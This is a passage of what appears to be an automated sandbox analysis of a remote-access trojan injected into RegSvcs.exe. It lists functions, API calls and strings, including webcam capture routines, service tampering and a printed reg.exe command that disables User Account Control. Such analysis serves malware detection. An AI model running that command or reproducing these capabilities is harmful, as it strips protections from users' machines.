                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                    Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 180fc6eb72b116d827b034a49e1adc61e94a7e22018ecd165a1f07ef89b3401f
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 180fc6eb72b116d827b034a49e1adc61e94a7e22018ecd165a1f07ef89b3401f
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                    Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                    Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                    Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                    Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                    • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                    • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                    Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                    Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                    Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                    Download Yara Rule
                                    Strings
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 004076C4
                                    • SG, xrefs: 004076DA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    • API String ID: 0-4153219426
                                    • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                    • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                    • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                    Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                    • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                    Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                    Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                    • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                    Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • _free.LIBCMT ref: 00444E06
                                    • _free.LIBCMT ref: 00444E1D
                                    • _free.LIBCMT ref: 00444E3C
                                    • _free.LIBCMT ref: 00444E57
                                    • _free.LIBCMT ref: 00444E6E
                                    Memory Dump Source
